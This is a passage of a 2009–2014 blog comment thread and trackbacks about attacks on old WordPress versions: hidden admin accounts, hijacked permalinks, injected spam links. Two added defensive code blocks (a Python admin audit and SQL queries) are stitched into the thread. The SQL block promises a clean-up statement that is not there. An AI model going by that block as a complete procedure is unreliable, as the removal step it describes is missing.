    In addition, if you just keep your old database (and don’t connect to it), you can connect with phpMyAdmin and get plugin settings, widget settings, or anything you forget like I’ve done for many clients.

  106. Posted September 13, 2009 at 10:57 pm | Permalink

    This post should be printed out, framed, placed next to the desk and read everyday in the morning. Thank you Lorelle.

  107. Posted September 14, 2009 at 1:04 am | Permalink

    With the exception of going out for lunch with the family, I spent 1 full day dealing with one blog. Admittedly I encountered a lot of problems that you wouldn’t normally (couldn’t get the image uploader working on a new upload). So, lesson learnt. I think I could now do another cleaning process in less than 2 hours. So what’s the best way to get notification of when a new WordPress release comes out?

  108. Posted September 14, 2009 at 9:20 am | Permalink

    Thank you for this. I’m new to WordPress, and value your wealth of information.

  109. Posted September 14, 2009 at 12:07 pm | Permalink

    “So what’s the best way to get notification of when a new WordPress release comes out?”

    This is the issue. Let’s be clear — WordPress folks have done an awesome job making it trivially easy to upgrade. What they need to do now is make it trivially easy to get *notified* that an upgrade is available.

    Specifically there needs to be an “Email admin when upgrade available” setting from within WordPress. Every time I’ve tried to sign up for the WordPress notification mailing list mentioned at WordPress.org, I never receive anything. And, frankly, it would be much better if all 15 of my installs e-mailed me individually so I don’t forget one.

    Yes, there’s now a plugin that will do this, but it needs to be built into WordPress and occasionally remind the admin that it’s there and can be turned on (i.e., the option shows up initially, and every time there’s an upgrade a “would you like to be reminded by email?”).

    Some of us don’t log in to our admin side everyday, and there doesn’t seem to be a reliable way to get notification about upgrades any other way other than visiting WordPress.org

  110. Posted September 16, 2009 at 4:23 am | Permalink

    Hello again.

    Sorry to be back again asking questions, but this is turning into quite a problem for me. So I’m back asking for your thoughts and assistance.

    I have cleaned up 3 of my blogs. All seems well with no issues. However, today the members of my SMF forum are reporting a virus on the forum. Now I know Lorelle’s site is not about SMF forums. But how much of a coincidence is this problem? Is it at all possible that the WordPress hack has spread across my server and infected my SMF installation? Is there any way to know for definite if this is the case, and can anyone advise on the way forward from here?

    • Posted September 16, 2009 at 11:36 am | Permalink

      Anything is possible, and this is not a WordPress-specific virus. Many other sites and platforms have been infected long before they were hitting WordPress, so your forums might have been infected as related or completely separate. Check with the smf forum folks NOW, not us nor WordPress. And good luck.

  111. nomi
    Posted September 18, 2009 at 12:45 am | Permalink

    To remove this problem, always update to the new version.
    thank you

  112. absolutelybangkok
    Posted September 19, 2009 at 9:32 pm | Permalink

    I’d like to add though that the introduction of 2.8 was pretty messy.

    I always upgraded the first minute a new version appeared, but 2.8 was totally buggy and many plugins didn’t work anymore.

    So I rolled back to 2.7.1.

    Within a short time 2.8.1, then .2, then .3, and then .4 were introduced.

    Maybe, before launching a major upgrade next time, that version should be slightly less bug-free.

    I love WP and many thanks for all the work put into it, but I think many users had many problems when switching from 2.7 to 2.8

    • Posted September 20, 2009 at 12:05 am | Permalink

      Interesting. The majority of WordPress users did not have this issue. Clearly, you were using Plugins that weren’t up to standard with the current version, nor upgraded, though I do hope you checked first and upgraded the Plugins before upgrading, which would have resolved this issue.

      WordPress released those small updates in response to security issues, not really bug fixes, often before the security issues were public or acted upon, protecting WordPress users. WordPress is working on educating WordPress Plugin authors about standards and updating and maintaining quality Plugins, which was your issue, not so much the version upgrade itself.

  113. Posted September 20, 2009 at 12:20 am | Permalink

    @absolutelybangkok: Yes, the quick version upgrade is probably a turn-off. The code is probably not polished off that well, which sparks off a number of bugs and security issues. As Lorelle mentioned, Plugins are another backdoor which hackers can use to enter. Make sure you don’t install too many Plugins … keep to a few reliable ones…

  114. absolutelybangkok
    Posted September 20, 2009 at 7:50 am | Permalink

    Thanks very much Lorelle & Joseph. Lesson learned – and I hope not too late!

    Deleted a hidden admin in DB and did a re-install of 2.8.4 – but 2 days after Viagra and Cialis links showed up again at the bottom of the pages …

    Did anyone have success with Joseph’s script?

  115. jtpratt
    Posted September 20, 2009 at 8:17 am | Permalink

    @absolutelybangkok I’ve removed this infection for many new clients, and the only way to get rid of it was by exporting all posts, pages, and comments in the existing site, then creating a new WordPress database with a new DB username and password, and importing all the pages, posts, and comments again into the new site.

    As a precaution I also started with a fresh copy of their theme at first, and fresh copies of every plugin they had. Then, at least all you have to do is re-setup your plugins, widgets, and blog settings (all of which can be copied from phpMyAdmin if you know how).

    In one particular instance I found that the infection and viagra and levitra links were coming from an infected version of Google XML Sitemap and not this permalink exploit.

    Once I rooted out the problems, I then stepped up security in the wp-config file, renamed the db tables from the default wp_ to something more obscure, and also created .htaccess files to lockdown both wp-admin and wp-content/uploads folders.

    In my opinion, the best defense against this and other XSS-type attacks is SEO Egghead’s WordPress Firewall plugin – it stops exploits like this dead in their tracks (and emails you on each attack attempt).

  116. Posted September 23, 2009 at 4:21 pm | Permalink

    Wow, this is good stuff to know. Thank you so much for sharing. I love your blog by the way. I found it a long time ago and I have been sending my fellow WP junkies here every time I get a change. You really have a fantastic way of getting what you need to across. Thank you for being such an awesome blogger. :)

  117. Scott G.
    Posted September 24, 2009 at 1:35 pm | Permalink

    Spam attacks like this can be so deadly for a website and its owner, particularly if it is a main source of income or the base of a blog marketing strategy. And, with so many people wary of upgrades due to the technical issues they sometimes have, this will affect a lot of users. Hopefully, everyone heeds your warning.

  118. Posted September 25, 2009 at 12:29 am | Permalink

    I have never updated my WordPress version after 2.7. Thank you so much for sharing this informative knowledge here. I wonder why I didn’t get this article before. I have decided to update to WordPress 2.8.4 as soon as possible. I hope it will work best for me.

  119. Posted November 4, 2009 at 1:13 pm | Permalink

    Scary stuff!
    I’ve only just set up my first wordpress site and all I read about is worms and infected sites.
    Fortunately I’m using 2.8.4 and will upgrade to 2.8.5 once it appears on cpanel.

    I’ll take a look at making my password a bit more difficult and check out a few more of the security tips out there.

    • Posted November 6, 2009 at 1:27 am | Permalink

      Thank you for your question. Please check the WordPress Codex and WordPress Support Forums for answers on this.

  120. Posted November 6, 2009 at 8:26 pm | Permalink

    Hi,

    My friend’s blog has already been hacked because of not updating WordPress to the new version. Thanks for this great info.

  121. Posted November 7, 2009 at 8:02 pm | Permalink

    Thank you! I’ve updated my WordPress and now it works fine.

  122. richardtov
    Posted November 29, 2009 at 12:46 pm | Permalink

    But what do you do when you are using a highly customized theme with custom tweaks, and when you update to the latest version everything will be f-ed up?

    • Posted December 2, 2009 at 1:35 pm | Permalink

      @richardtov: Updating does not touch your WordPress Theme. However, if you are customizing a Theme or using a custom Theme, always keep backups of everything, just in case harm is done to your Theme.

  123. Posted November 29, 2009 at 7:26 pm | Permalink

    Lucky for me using blogging at wordpress.com, it’s always auto update :)

  124. Posted December 2, 2009 at 6:40 pm | Permalink

    Don’t forget the most important line of defence .. make a current backup of your blog .. including the posts XML as well as your database.

  125. Sen. Sajonara
    Posted December 11, 2009 at 2:13 am | Permalink

    If anyone is really wondering what is happening here: it’s a code injection that has not been properly patched out for several versions. After this mess with some 2.8.x hopping from version to version, the “right” patch finally made it into the core code, and the developers are paying more attention to removing dangerous code at its root.

    Always try to stay with the latest version. If plugins break, find other users of that plugin so that you can help each other and you can help the plugin’s developer as well. If a plugin isn’t supported any longer, try to find an alternative (I know there is a lot of fluctuation) and consider actually supporting plugin developers, because most often this is a single person who is doing this in their free time, so it’s no wonder that in the long run stuff gets more or less unsupported. Sending some warm words of support and some bucks won’t hurt anybody.

    Each $ I pay for free source software I get back more than ten times. It’s that easy. Find other users, select a plugin or project you like to support and help your bit. I’m pretty sure it will always pay; just check if the plugin is GPLed, which will enable other supporters and developers to help. Tell your plugin’s developer about the features wordpress.org has to offer to share their code (SVN access, plugin repository). This helps as well to find more developers for a plugin.

  126. Posted April 3, 2010 at 9:15 pm | Permalink

    I just got hit with this attack on several sites at once. It seems that if you use add on domains, it can find multiple blogs quickly as they are all on the same shared hosting account. I’m on the current WordPress version, so no one is immune at this point. My host (HostGator) mentioned a breach of my ftp recently which happened just a couple days before this happened, so that might have to do with it too.

  127. shock
    Posted April 19, 2010 at 3:14 pm | Permalink

    I’m the one who used to use the old version of WordPress because I would like to try new things, and I admit that I heard a lot of “WordPress under attack” news. However, now I have turned myself to the new version and I found that there’s nothing to worry about. Absolutely agree with this article.

  128. Posted April 28, 2010 at 6:14 pm | Permalink

    Admin, I’m presently experiencing a serious attack on my blog which I’m finding very hard to get rid of. Please, is there any way you can assist me to get it fixed?

    • Posted May 3, 2010 at 9:23 pm | Permalink

      There are many web developers and helpful articles for resolving site hacks. Check in with the WordPress Support forum for help and advice or look to the WordPress job services for someone to help you. And always upgrade immediately. Good luck.

  129. Matt
    Posted May 12, 2010 at 5:49 am | Permalink

    I have been attacked four times in the past month. I updated all my blogs and reset the passwords as well.

    Pain in the f’n arse!

  130. Posted May 24, 2010 at 9:12 pm | Permalink

    Thanks for sharing this great information. Just updated mine.

  131. Posted May 27, 2010 at 6:01 pm | Permalink

    It seems a lot of the sites hit are unfortunately being found by leaving the ‘powered by WordPress’ text. Sites may be being found by this tag.

    Also, on a couple of my sites that were hit I noticed not only a large chunk of JavaScript in the header and footer but in one instance a good ole fashioned iframe hit.

    i wish these b@st@rds would find something else to do. i am all for pointing out security holes – used to wear the black hat myself – but in my day we just posted our little “flag” and that was that..no harm no foul. this is costing hard working people hundreds of hours and possibly thousands of dollars of lost income.

  132. Posted June 12, 2010 at 6:04 am | Permalink

    I was sitting on my webpage, doing nothing, and I got a virus attack on my computer. So, I ran my Antivirus plugin on my blog to see what I turned up. The theme I use is the “Atahualpa” theme and I love it. I saw a few tags which include “eval” in the theme so I was going to erase them. (Naturally) I realized, however, that my code was indeed CODED that way. So I looked up the PHP term “eval” and sure enough it’s part of a loop. REPL is what it’s referred to. So, I reread the article and realized you said it was in permalinks. I’m very happy to see that that is all it turned out to be.. lol. Relieved really.

    • Posted July 6, 2010 at 9:31 pm | Permalink

      A virus attack on your home or office computer may be completely unrelated to virus attacks on your website, unless your computer is the web host server. Please treat them separately as they may not be related.

  133. Flinn
    Posted June 27, 2010 at 4:50 am | Permalink

    I am already so terrified by this hacking stuff, and on top of that my hosting is not helping me; any help is much appreciated.

  134. Posted June 30, 2010 at 9:28 am | Permalink

    It seems that WordPress is indeed under attack but thankfully, I updated mine timely.

  135. Desentupidora
    Posted July 1, 2010 at 11:31 am | Permalink

    Lorelle, I’m really enjoying your blog about WordPress!

    I’m almost changing my mind about “Joomla! against WordPress” and installing a WordPress here, for whoever knows something about the doubt… a place for users to discuss!

    As soon as I have the address I’ll paste it here!
    Can I?

  136. john
    Posted July 14, 2010 at 9:37 pm | Permalink

    my wordpress got hacked last month.

  137. Posted August 15, 2010 at 3:55 am | Permalink

    I was able to remove the extra admin user in the wpuser and wpusermeta tables through phpmyadmin and then upgrading. After, I had to reset my permalinks, but everything seems to have come out rosy

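The comment above, and the trackback further down that describes an extra administrator account the Users screen does not show, both come down to the same check: read the role from the usermeta table directly instead of trusting the admin panel. The following is an added example, not code from the original post or from WordPress itself. WordPress keeps each user's roles as a PHP-serialized array in usermeta under the key `<prefix>capabilities`, so the query looks for the string `"administrator"` in that value and joins it to the users table. It runs here against an in-memory SQLite copy of the two tables seeded with constructed rows (one legitimate admin, one editor, one extra admin the owner never created); on a live site run the same SQL through MySQL or phpMyAdmin. The `prefix` parameter covers sites that renamed the default `wp_` prefix, and is validated before it is put into the query.

```python
"""Audit WordPress user tables for administrator accounts the owner did not create.

Added example; not code from the original post or from WordPress. The rows in
build_sample_db() are constructed for illustration.
"""
import re
import sqlite3

PREFIX_RE = re.compile(r"^[A-Za-z0-9_]+$")


def valid_prefix(prefix):
    """The table prefix is interpolated into SQL, so allow only word characters."""
    return bool(PREFIX_RE.match(prefix))


def list_admins(conn, prefix="wp_"):
    """Every user whose serialized capabilities array contains the administrator role.

    Returns rows of (ID, user_login, user_email, user_registered), oldest ID first.
    """
    if not valid_prefix(prefix):
        raise ValueError("refusing table prefix %r" % prefix)
    sql = (
        "SELECT u.ID, u.user_login, u.user_email, u.user_registered "
        "FROM {p}users AS u JOIN {p}usermeta AS m ON m.user_id = u.ID "
        "WHERE m.meta_key = ? AND m.meta_value LIKE '%\"administrator\"%' "
        "ORDER BY u.ID"
    ).format(p=prefix)
    # The meta key carries the table prefix as well, e.g. wp_capabilities.
    return conn.execute(sql, (prefix + "capabilities",)).fetchall()


def find_unexpected_admins(conn, expected_logins, prefix="wp_"):
    """Admin rows whose login is not in the set of accounts the site owner knows."""
    return [row for row in list_admins(conn, prefix) if row[1] not in expected_logins]


def build_sample_db(prefix="wp_"):
    """In-memory copy of the users and usermeta tables with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE {p}users (ID INTEGER PRIMARY KEY, user_login TEXT, "
        "user_email TEXT, user_registered TEXT);"
        "CREATE TABLE {p}usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER, "
        "meta_key TEXT, meta_value TEXT);".format(p=prefix)
    )
    users = [
        (1, "admin", "owner@example.com", "2008-03-01 10:00:00"),
        (2, "editor", "editor@example.com", "2009-01-15 09:30:00"),
        (3, "support", "noreply@example.net", "2009-09-05 02:13:44"),  # not created by the owner
    ]
    # Roles are stored as a PHP-serialized array; "administrator" is 13 characters.
    meta = [
        (1, 1, prefix + "capabilities", 'a:1:{s:13:"administrator";b:1;}'),
        (2, 2, prefix + "capabilities", 'a:1:{s:6:"editor";b:1;}'),
        (3, 3, prefix + "capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    ]
    conn.executemany("INSERT INTO {p}users VALUES (?,?,?,?)".format(p=prefix), users)
    conn.executemany("INSERT INTO {p}usermeta VALUES (?,?,?,?)".format(p=prefix), meta)
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    for row in find_unexpected_admins(db, {"admin"}):
        print("unexpected administrator:", row)
```

Compare the count this returns with the administrator count shown in brackets on the Users screen; a mismatch is the symptom the thread describes. Deleting the row is only part of the cleanup, as the replies above stress: the account is a symptom of whatever injected it.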
  138. Posted September 23, 2010 at 10:32 am | Permalink

    My blog was hit by iskorpitx earlier this week. My ISP claims to have “sealed the security leak”, but they wouldn’t give me any details. I have since upgraded as well.

  139. Posted September 25, 2010 at 3:48 am | Permalink

    I am usually hesitant about immediately upgrading any software because new stuff can introduce new bugs as well. How can I be sure the update is stable? I tend to prefer letting other people test and iron out all the issues. What can I do about these security issues? It seems the only thing I can do is just have daily backups.

    • Posted September 26, 2010 at 5:24 pm | Permalink

      @jeff: This was true years ago, it isn’t any more. Security updates aren’t for jokes. Upgrade immediately.

  140. Daniel
    Posted October 19, 2010 at 1:57 am | Permalink

    Great article about WordPress security. People have to understand that they always need to check potential vulnerabilities.

    And they also need to hide that they are using WordPress (for example, with the WordPress meta in the header.php).

  141. Dan
    Posted November 24, 2010 at 9:00 am | Permalink

    Thanks for this post!

    Even though I have upgraded myself, I believe it’s important for people to know why they should put their fears aside and update.

    WordPress is much better than joomla to update :) I’m sure you agree…

    Dan

    • Posted November 24, 2010 at 11:10 am | Permalink

      I’m not sure I understand you. Old versions of WordPress as well as other publishing platforms that rely upon PHP and MySQL are constantly under attack. WordPress is not immune, nor is Joomla. As for updating, I believe that Joomla has improved considerably but I’m in no place to judge which is “better.” I do know that WordPress has worked very hard in the last few years to improve upgrades dramatically.

  142. Posted February 21, 2011 at 8:34 pm | Permalink

    Thanks for a great post. My blog has been attacked by a hacker. They pushed some PHP injection into my blog somehow, though I couldn’t retrieve it myself. I got help from my guru Jinnat Ul Hasan.

    Now I’m very much aware about my blogs security.

  143. Josh
    Posted February 22, 2011 at 12:48 am | Permalink

    Thanks for post. Had a client that came to me who was very reluctant to update their WordPress sites. Yet they said things were kind of off and funny recently, noticing weird links that go to “Chinese sites”. So I look into it and they hadn’t updated in over four years! So yeah, first thing I did was back it all up and updated everything, redesigned and optimized their site, and 301’d the rest. Huge difference now, it’s quickly climbing local Google results as well. Amazes me how many people just don’t update, especially now that things are near automatic, just seems ridiculous.

    • Posted February 22, 2011 at 6:06 pm | Permalink

      I’m sure in the process you checked thoroughly for viruses and other nasties. Upgrading will NOT fix these if it is infected.

  144. Posted March 9, 2011 at 11:04 pm | Permalink

    I am still using WordPress 2.6 on my site, and there is a problem that I can’t edit Settings > Reading. If I upgrade to a higher version, will the problem be solved?

    • Posted March 10, 2011 at 10:04 am | Permalink

    Yes, but you must step up your upgrade in stages, as there are several big database changes in between. Back up everything, or consider doing an XML export and then import it after you upgrade. You’ll have to upgrade and replace your Theme and all WordPress Plugins. It’s a big job, but if you can’t edit or change anything, it is highly likely your site has been hacked and invaded by some lovely specimen that causes havoc on the web. This could be serious. Don’t delay.

  145. Posted April 13, 2011 at 4:27 pm | Permalink

    My WordPress blog is up to date (I’ve updated it), but the nag screen doesn’t disappear and tells me that I have to upgrade it!

  146. Marcelo Bessi
    Posted April 14, 2011 at 11:00 am | Permalink

    WordPress.com is running the latest version of WordPress mu at pretty much all times!!

  147. yvonne nolte
    Posted June 1, 2011 at 2:02 am | Permalink

    These are important guides to prevent any attack on our WordPress blog. Thanks.

  148. stacie smith
    Posted July 10, 2011 at 2:15 pm | Permalink

    I had experienced being hacked. My site wouldn’t show the posts that I had made. A Russian-sounding song was playing instead. Because I’m not website savvy, I hired someone to do the job. We had to reload my posts again because that was the easy solution to make. Thanks for these tips; even if this was made a few years ago, it’s very useful still. Thanks.

    • Posted July 11, 2011 at 9:03 am | Permalink

      The threat does not go away because the post might be “dated.” :D Sorry you had to hire someone, but that is what can happen when you don’t update immediately after a mandatory security update.

  149. Amit
    Posted August 25, 2011 at 12:04 pm | Permalink

    Yes, we must keep our WordPress versions updated, otherwise we will be hacked.

  150. Antony Pratap
    Posted September 27, 2011 at 5:20 am | Permalink

    My blogs have been attacked so many times. Thank you very much, I know what to do now.

  151. Posted February 4, 2012 at 6:58 am | Permalink

    I still have some problems with being hacked now and again. How can I best secure my wordpress?

    • Posted February 4, 2012 at 10:24 am | Permalink

      Depends upon what you mean by “hacked.” There are many articles on this site and others with all kinds of advice on protecting the security level of your WordPress site or any site on any platform. Use your administration login only when you have to change design and core elements. Use an Editor user login for publishing to limit access if that password is captured and used by others. Upgrade WordPress with every mandatory upgrade without delay. Don’t download, upload, or click on anything you don’t know or trust. Don’t use WordPress Themes or Plugins from untrusted sources. That’s pretty much it.

  152. Posted December 2, 2012 at 4:09 am | Permalink

    Yes, I have come across this worst attack. Unfortunately I have a problem with auto-updating WordPress.

    • Posted December 2, 2012 at 12:26 pm | Permalink

      Your comment form says you are on WordPress.com, but I assume you are not as WordPress.com sites are protected extensively. Sorry for your issue. Contact your server to help.

  153. Asa
    Posted May 28, 2013 at 11:03 pm | Permalink

    Updating becomes a problem if you have customized files, especially the core WordPress files.

    • Posted May 29, 2013 at 10:44 am | Permalink

      Editing WordPress core files is seriously wrong. There are no reasons today to do so. All such “customizations” are to be done with WordPress Plugins or Themes. Don’t do it. Ever. For that reason and so many more.

  154. Gaurav Heera
    Posted July 15, 2013 at 12:19 am | Permalink

    thanks for the valuable info….

    It’s really a big issue… spam attacks may kill a blog overnight.

    will definitely follow your instructions.

    • Posted July 15, 2013 at 8:09 am | Permalink

      Spam doesn’t kill a blog. Viruses, hacks, malware, DNS, the list of what can get a site, and often it takes months or years to be detected, are the plague of the web.

      Thanks.

  155. sagarmdesai
    Posted September 2, 2013 at 4:42 am | Permalink

    Hey thanks for the valuable info.

    • Posted September 3, 2013 at 1:33 pm | Permalink

      Thank you. Be aware that this is an old article though the links and information is still relevant. Please update WordPress immediately if you haven’t already to keep your site up to date against security risks. Thanks.

  156. Posted November 9, 2013 at 2:27 am | Permalink

    I always update wordpress. thanks for the info

  157. Neha
    Posted December 16, 2013 at 5:19 am | Permalink

    now i regularly update my wordpress..thanks for the information..!!

  158. Angelina
    Posted December 21, 2013 at 11:59 pm | Permalink

    yes..updating is the solution..thANKS FOR THE UPDATE…!!

  159. sharma
    Posted December 28, 2013 at 3:04 am | Permalink

    Thanks for the update, it was essential…!!!! I saw a few tags which include “eval” in the theme so I was going to erase them. (Naturally) I realized, however, that my code was indeed CODED that way. So I looked up the PHP term “eval” and sure enough it’s part of a loop. REPL is what it’s referred to. So, I reread the article and realized you said it was in permalinks. I’m very happy to see that that is all it turned out to be.. lol. Relieved really.

  160. jamesjohnonline
    Posted July 23, 2014 at 6:58 am | Permalink

    Hi, thanks for this nice piece of information. My blog has recently been receiving too many brute force attacks. I have installed the WordPress Limit Login plugin and solved that issue to a great extent.

    • Posted July 23, 2014 at 5:30 pm | Permalink

      Glad that helped, but remember that updating immediately is your best and first line of defense.

  161. Rahul Shishodia
    Posted August 4, 2014 at 9:23 pm | Permalink

    Very useful info, upgraded my blog to 3.9.1

    Thanks

  162. Harman Gill
    Posted August 22, 2014 at 7:31 am | Permalink

    Hello, I have a WordPress site, but after updating WordPress the CSS of my theme is not working. I have updated the theme many times but nothing works. Please tell me any solution. I am using the Sahifa theme and I don’t want to change my theme. Thanks in advance.

    • Posted August 22, 2014 at 11:54 pm | Permalink

      Do not update a WordPress Theme without working on a Child Theme version of the Theme.

      There could be many reasons why the changes do not work. Contact the Theme author or WordPress support forum for more specific help.

  163. Dcntrahul
    Posted September 20, 2014 at 1:08 am | Permalink

    Hey thanks for the info.. Updating my WordPress blog..


443 Trackbacks/Pingbacks

  1. [...] Old WordPress Versions Under Attack: Older version of WordPress are being attacked and characters are being added to the permalinks. Sure signs of the attack include strange characters in your permalinks (single posts do not work) and an extra administrator account in the users control panel which you cannot see. Look for the administrator count in brackets at the top. Is the number there what you would expect on your blog? [...]

  2. [...] http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ Lorelle says it affects old versions, but it is also affecting current versions [...]

  3. [...] Read at Lorelle on WordPress [...]

  4. [...] the original post: Old WordPress Versions Under Attack « Lorelle on WordPress Comments0 Leave a Reply Click here to cancel [...]

  5. [...] subscribe via RSS feed or email to receive the latest posts. It’s free! Lorelle explains the problem and the solutions in detail; the idea is to update WordPress to the latest version immediately, if you haven’t done so already. [...]

  6. [...] website, heads up and here’s a good article with links to other useful articles: “Old WordPress Versions Under Attack” by Lorelle on [...]

  7. [...] with its simple dashboard and ease of navigation. Hence, it is fast becoming a hot ground for hacking too. Hence, its constant versioning has kept the developers busy. This reminds me of Windows being [...]

  8. [...] Full report at Lorelle on WordPress. [...]

  9. [...] http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ (@Tweetmeme first alerted me to it) [...]

  11. [...] can find a lot more info at Lorelle’s Blog. Posted by zen   @   5 September 2009 0 comments Tags : hack , [...]

  12. [...] More here: Old WordPress Versions Under Attack « Lorelle on WordPress [...]

  13. [...] attack, wordpress hack, WordPress News, wordpress permalinks, … View example here: Old WordPress Versions Under Attack « Lorelle on WordPress Posted in Uncategorized | Tags: and-filed, and-posted, entry, lorelle, posted-on-september, [...]

  14. [...] Major WordPress Attack Underway! Posted by geeknews at 9:02 PM on September 4, 2009 If you are running a older version of WP version 2.8.3 or before you need to upgrade immediately. You risk having to re-install WordPress, this appears to be a pretty major attack. If you host your blog at wordpress.com you are ok. This attack is reportedly growing by the hour. [...]

  16. [...] I haven’t written all of this yet. You can read it in full at Old WordPress Versions Under Attack. There are many links to important posts there. Come on.. [...]

  17. [...] Remote Desktop 3.3.1 Client Update Now AvailableSnow Leopard and Rosetta Interesting on the WebOld WordPress Versions Under AttackSnow Leopard's Four Best Improvements (for Civilians)MacJury #913: Passing Judgement on Snow [...]

  18. [...] must realize it is that if you maintain your own blog using this blogging tool, keep it up to date! As this article illustrates, having your WP blog hacked is not nearly as unlikely as we might like to [...]

  19. [...] upgrade your blog and change your password to a stronger one; you can visit Lorelle’s Blog to find more ways to secure your install and remove the admin account [...]

  20. [...] is a strange post: Old WordPress Versions Under Attack « Lorelle upon WordPress Related Posts:Breaking: WordPress MySQL injection – how to fix latest attack [...]

  21. [...] If you use self-hosted WordPress for your blog and you’re not using the latest version, 2.8.4, you’re running a severe risk of your site security being compromised and even [...]

  22. [...] you so much for Lorelle on WP for making a post about this, so I got the news (check Lorelle’s post for all the [...]

  23. [...] information on what you can do to prevent a hack can be found in last night’s article by Lorelle and the list below of [...]

  24. [...] security. The number of attacked sites is growing hour by hour. It is so serious that Lorelle VanFossen, in her blog post, recommends updating to the latest version before continuing [...]

  25. [...] So just get going and update! Read more at Lorelle on WordPress. [...]

  26. [...] Old WordPress Versions Under AttackSeptember 4, 2009 [...]

  27. [...] I have since fixed it – but the attack was typical of the description at this helpful website: Old WordPress Versions Under Attack Lorelle on WordPress My permalinks were changed, so the posts were inaccessible. I also had a 'hidden' admin set up, [...]

  28. [...] An article explaining this in more detail: Old WordPress Versions Under Attack Lorelle on WordPress A way to get rid of the 'hidden' admin: WordPress Permalink & Rss problems If you need to do [...]

  29. [...] It turns out that in the last day a security hole in old versions of WordPress was exploited to set up a user with admin permissions. For some reason the intruder wrecked the links along the way; otherwise this probably would not have been discovered… Details at Lorelle. [...]

  31. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  32. [...] Lorelle has news that older versions of WordPress are being attacked. Symptoms include: [...]

  35. [...] Lorelle and OttoDestruct are alerting WordPress users, urging them to upgrade now. [...]

  36. [...] Old WordPress Versions Under Attack « Lorelle on WordPress a few seconds ago from Gwibber [...]

  38. [...] TechCrunch echoes a new attack on old versions of WordPress that is being reported on Lorelle. [...]

  39. [...] more about the hacker attack and prevention here Posted in Blive [...]

  44. [...] issue is all about, including the tell-tale signs that suggest your site may have been compromised, read Lorelle VanFossen’s post with the alert about this issue. She also has links to some terrific resources on how to strengthen [...]

  46. [...] a warning. A short while ago, citing Lorelle VanFossen, TechCrunch [...] all old versions [...]

  47. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  49. [...] of WordPress at the moment, which is WordPress 2.8.4 Released. Lorelle has a good writeup on how old WordPress versions are under attack. To summarize, here’s what to look out for if you think your WordPress site may have been [...]

  51. [...] WordPress Under Attack [...]

  52. [...] : Link Posted in Tech/Science « Bit.ly Launches J.mp : Smaller URL by 2 Characters You can [...]

  53. [...] Jinnat Ul Hasan on September 5, 2009 Today, mentioning a blog post by Lorelle VanFossen, TechCrunch has warned bloggers using old versions of WordPress that they may become an object to [...]

  55. [...] [Lorelle on WordPress ] Also Read WordPress 2.8.4 Security Release AvailableAn Unexpected WordPress 2.8.2 Security [...]

  56. [...] of WordPress than the current version (2.8.4 as of this writing), you need to upgrade now! From Lorelle on WordPress: Otto42 of OttoDestruct, a key WordPress developer and supporter, reports that there is an [...]

  60. [...] Old WordPress Versions Under Attack « Lorelle on WordPress You should update WordPress to the latest version as soon as possible, as all versions prior to 2.8.3 are at risk. (tags: WordPress security) [...]

  62. [...] read that a security hole has been discovered in WordPress! So everyone who is not yet on version 2.8.4: update! Anyone already affected [...]

  63. [...] server it is vital that you upgrade to the current version now. Here are some of the details from Lorelle on WordPress, read them now and update ASAP: Update your WordPress blog before you continue reading this post. [...]

  68. [...] an ongoing attack. Users of WordPress.com hosted blogs are not affected. The warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  69. [...] more info on the attack. If you have a WordPress site, PLEASE READ THIS: http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ This entry was posted on Saturday, September 5th, 2009 at 7:31 am. You can follow any responses [...]

  71. [...] Yesterday, I went to post my blog entry, and discovered that a lot of links on my blog didn't work. I eventually discovered that it wasn't an isolated problem, but was an instance of this attack. [...]

  72. [...] Old WordPress Versions Under Attack « Lorelle on WordPress [...]

  73. [...] Lorelle on WordPress and Mashable are spreading the word that a large WordPress attack is underway. For [...]

  76. [...] Old WordPress Versions Under Attack – Upgrade to the newest version to prevent infection. Also Microsoft: Cyber-crooks exploiting [...]

  80. [...] Old WordPress Versions Under Attack « Lorelle on WordPresslorelle.wordpress.com [...]

  81. [...] Lorelle and WPBeginner.com. Via Twitter, or rather via Frank [...]

  82. [...] www@www.com. This user must also be deleted manually from the DB since it does not show up in the [...]
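Trackbacks 27, 28 and 82 above describe the same two symptoms of this attack: a changed permalink structure, and an administrator account that does not appear in the Users panel and has to be removed from the database by hand. The queries below are an added example, not code from the original post or from WordPress itself, that read the places in the database where those two symptoms show up. They assume the default `wp_` table prefix (the capabilities meta key carries the same prefix, so both change if wp-config.php sets another `$table_prefix`) and a single legitimate login named `admin`; both are assumptions for illustration, as is the placeholder ID 123 in the commented-out clean-up.

```sql
-- Added example. Assumes the default wp_ table prefix; if wp-config.php sets
-- $table_prefix to something else, rename the tables and the meta key below.

-- 1. Every account with its role, read straight from the tables regardless of
--    what the Users panel displays. Roles are stored in wp_usermeta as a
--    serialized PHP array under the key wp_capabilities.
SELECT u.ID,
       u.user_login,
       u.user_email,
       u.display_name,
       u.user_registered,
       m.meta_value AS capabilities
FROM   wp_users AS u
LEFT JOIN wp_usermeta AS m
       ON m.user_id = u.ID
      AND m.meta_key = 'wp_capabilities'
ORDER BY u.user_registered DESC;

-- 2. Only administrators, minus the logins you know you created. The single
--    login 'admin' is an assumption for this example; list your own.
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM   wp_users AS u
JOIN   wp_usermeta AS m
       ON m.user_id = u.ID
      AND m.meta_key = 'wp_capabilities'
WHERE  m.meta_value LIKE '%"administrator"%'
  AND  u.user_login NOT IN ('admin');

-- 3. The permalink structure that trackback 27 reports was changed, plus the
--    rewrite rules cached from it. A structure you set yourself is a plain
--    tag pattern such as /%year%/%monthnum%/%postname%/; a value you do not
--    recognise, or one containing anything besides tags and slashes, is a sign.
SELECT option_name, option_value
FROM   wp_options
WHERE  option_name IN ('permalink_structure', 'rewrite_rules');

-- 4. Removal, once an ID from query 2 is confirmed rogue and a backup exists.
--    Both rows must go: deleting only the wp_users row leaves the capability
--    record behind in wp_usermeta.
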